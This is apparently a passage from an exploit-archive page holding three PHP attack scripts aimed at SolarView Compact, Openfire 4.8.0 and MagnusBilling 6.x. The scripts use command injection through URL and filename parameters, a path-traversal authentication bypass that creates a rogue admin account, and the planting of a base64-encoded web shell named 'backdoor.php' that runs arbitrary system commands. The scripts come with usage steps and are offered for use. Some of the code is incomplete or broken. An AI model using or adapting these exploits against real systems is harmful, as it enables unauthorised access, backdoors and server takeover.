        $cmd = "echo {$payload}|base64 -d >tmp/{$this->webshellName}";  
        return $this->executeCommand($cmd);  
    }

    public function executePhp($cmd) {  
        $payload = base64_encode($cmd);  
        return $this->sendRequest('POST', "/tmp/{$this->webshellName}", [  
            $this->postParam => $payload  
        ]);  
    }

    public function executeCommand($cmd) {  
        // Encode payload with base64 to ensure proper execution  
        $payload = base64_encode($cmd);  
        $cmd = "echo {$payload}|base64 -d|bash";  
        return $this->sendRequest('GET', '/downloader.php', [  
            'file' => ";{$cmd};.zip"  
        ]);  
    }

    public function check() {  
        // Checking if the target is vulnerable by echoing a randomised marker  
        echo "Checking if {$this->targetUri} can be exploited.\n";  
        $marker = $this->generateRandomString(16);  
        $res = $this->executeCommand("echo {$marker};cat /opt/svc/version");

        if ($res && $res['code'] == 200 && strpos($res['body'], $marker) !== false) {  
            if (preg_match('/SolarView Compact ver\.\d\.\d\d/', $res['body'], $matches)) {  
                return "Vulnerable: " . $matches[0];  
            }  
        }  
        return 'Safe: No valid response received from the target.';  
    }

    public function exploit($payload) {  
        echo "Executing payload on {$this->targetUri}.\n";  
        $res = $this->uploadWebshell();

        if (!$res || $res['code'] !== 200) {  
            throw new Exception('Web shell upload error.');  
        }

        $this->executePhp($payload);  
    }

    private function sendRequest($method, $uri, $params) {  
        $url = $this->targetUri . $uri;  
        $options = [  
            'http' => [  
                'method' => $method,  
                'header' => 'Content-Type: application/x-www-form-urlencoded',  
                'timeout' => $this->timeout,  
                'content' => http_build_query($params)  
            ]  
        ];

        $context = stream_context_create($options);  
        $response = @file_get_contents($url, false, $context);  
        $code = isset($http_response_header[0]) ? intval(substr($http_response_header[0], 9, 3)) : 0;

        return [  
            'code' => $code,  
            'body' => $response  
        ];  
    }

    private function injectPhpPayloadPng($phpPayload) {  
        // Here you would implement the logic to inject the PHP payload into a PNG file.  
        // This is a placeholder implementation.  
        return $phpPayload; // Modify this to return the actual PNG with embedded PHP payload.  
    }

    private function generateRandomFileName($length = 16) {  
        return bin2hex(random_bytes($length / 2)) . '.php';  
    }

    private function generateRandomString($length) {  
        return bin2hex(random_bytes($length / 2));  
    }  
}

// Example of usage  
$targetUri = 'http://target-ip'; // Replace with the actual target URL  
$exploit = new SolarViewExploit($targetUri);  
echo $exploit->check();  
$exploit->exploit('whoami'); // Replace with your payload

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

SolarView Compact 6.00 Code Injection

Openfire version 4.8.0 suffers from authentication bypass and code injection vulnerabilities.

    =============================================================================================================================================| # Title     : Openfire release 4.8.0 Code Injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.igniterealtime.org/projects/openfire/                                                                           |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 115 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass OpenfireExploit{    private $targetUrl;    private $adminUsername;    private $adminPassword;    private $pluginName;    private $csrfToken;    public function __construct($targetUrl, $adminUsername = null, $adminPassword = null, $pluginName = null)    {        $this->targetUrl = rtrim($targetUrl, '/') . '/';        $this->adminUsername = $adminUsername ?? $this->generateRandomString(8, 15);        $this->adminPassword = $adminPassword ?? $this->generateRandomPassword(8, 10);        $this->pluginName = $pluginName ?? $this->generateRandomString(8, 15);    }    private function generateRandomString($minLength, $maxLength)    {        $length = rand($minLength, $maxLength);        return substr(str_shuffle("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $length);    }    private function generateRandomPassword($minLength, $maxLength)    {        return bin2hex(random_bytes(rand($minLength, $maxLength) / 2));    }    private function sendRequest($method, $uri, $data = null, $headers = [])    {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $this->targetUrl . $uri);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);        if ($data) {            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        return curl_exec($ch);    }    private function getCsrfToken()    {        $response = $this->sendRequest('GET', 'login.jsp');        preg_match('/csrf=([^;]+)/', $response, $matches);        return $matches[1] ?? null;    }    private function authBypass()    {        $this->sendRequest('GET', 'setup/setup-s/../../../../user-groups.jsp');        // Check if we can access the user-groups.jsp page        return $this->sendRequest('GET', 'setup/setup-s/../../../../user-groups.jsp') !== false;    }    private function addAdminUser()    {        $this->csrfToken = $this->getCsrfToken();        $data = http_build_query([            'csrf' => $this->csrfToken,            'username' => $this->adminUsername,            'password' => $this->adminPassword,            'passwordConfirm' => $this->adminPassword,            'isadmin' => 'on',            'create' => 'Create User'        ]);        return $this->sendRequest('POST', 'setup/setup-s/../../../../user-create.jsp', $data);    }    private function uploadPlugin($pluginFilePath)    {        $this->csrfToken = $this->getCsrfToken();        $cfile = new CURLFile($pluginFilePath);        $data = [            'uploadfile' => $cfile,            'csrf' => $this->csrfToken        ];        $headers = ['Content-Type: multipart/form-data'];        return $this->sendRequest('POST', 'plugin-admin.jsp', $data, $headers);    }    public function exploit()    {        if ($this->authBypass()) {            echo "Authentication bypass successful.\n";            if ($this->addAdminUser()) {                echo "Admin user '{$this->adminUsername}' added successfully.\n";                // Prepare plugin JAR file path                $pluginJarPath = '/path/to/plugin.jar'; // Replace with actual path to the JAR file                if ($this->uploadPlugin($pluginJarPath)) {                    echo "Plugin uploaded successfully.\n";                } else {                    echo "Failed to upload plugin.\n";                }            } else {                echo "Failed to add admin user.\n";            }        } else {            echo "Authentication bypass failed.\n";        }    }}// Usage$exploit = new OpenfireExploit('http://target-openfire-url.com');$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Openfire 4.8.0 Code Injection

MagnusBilling version 6.x suffers from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : MagnusBilling 6.x Code Injection Vulnerability                                                                              |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.magnusbilling.org/                                                                                              |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 83 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class MagnusBillingExploit {  
    private $targetUri;  
    private $webShellName;

    public function __construct($targetUri) {  
        $this->targetUri = $targetUri;  
    }

    // Function to execute commands on the target  
    public function executeCommand($cmd) {  
        $url = $this->targetUri . '/lib/icepay/icepay.php?democ=/dev/null;' . $cmd . ';#';  
        return file_get_contents($url); // Send HTTP request  
    }

    // Function to execute PHP code on the target  
    public function executePhp($cmd) {  
        $payload = base64_encode($cmd);  
        $url = $this->targetUri . '/lib/icepay/' . $this->webShellName;  
        $postFields = [$this->postParam => $payload];  
        return $this->sendPostRequest($url, $postFields); // Send POST request  
    }

    // Upload backdoor webshell to the target  
    public function uploadBackdoorWebShell() {  
        // Name of the webshell to be uploaded  
        $this->webShellName = "backdoor.php"; // Set a specific name for the backdoor file

        // Backdoor PHP code (this allows execution of commands passed through a GET parameter 'cmd')  
        $backdoorCode = "<?php if(isset(\$_GET['cmd'])){system(\$_GET['cmd']);} ?>";

        // Encode the webshell content  
        $encodedPayload = base64_encode($backdoorCode);

        // Construct the command to upload the backdoor  
        $cmd = "echo {$encodedPayload} | base64 -d > ./{$this->webShellName}";

        // Execute the command to upload the backdoor  
        return $this->executeCommand($cmd);  
    }

    // Check if the target can be exploited  
    public function check() {  
        $url = $this->targetUri;  
        $response = file_get_contents($url);  
        if (!$response || !preg_match('/MagnusBilling/i', $response)) {  
            return "Safe: Likely not a MagnusBilling application.";  
        }

        $sleepTime = rand(4, 8);  
        $this->executeCommand("sleep {$sleepTime}");  
        sleep($sleepTime); // Simulate blind command injection

        return "Vulnerable: Command injection successful.";  
    }

    // Main function to exploit the target  
    public function exploit() {  
        echo "Uploading backdoor...\n";  
        $result = $this->uploadBackdoorWebShell();  
        if (!$result) {  
            die("Backdoor upload failed.");  
        }  
        echo "Backdoor uploaded at: {$this->targetUri}/lib/icepay/{$this->webShellName}\n";  
    }

    // Helper function to send POST requests  
    private function sendPostRequest($url, $postFields) {  
        $options = [  
            'http' => [  
                'method' => 'POST',  
                'header' => 'Content-Type: application/x-www-form-urlencoded',  
                'content' => http_build_query($postFields)  
            ]  
        ];  
        $context = stream_context_create($options);  
        return file_get_contents($url, false, $context);  
    }  
}

// Usage example  
$exploit = new MagnusBillingExploit('http://target-url/mbilling');  
$exploit->exploit();

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Tag

#windows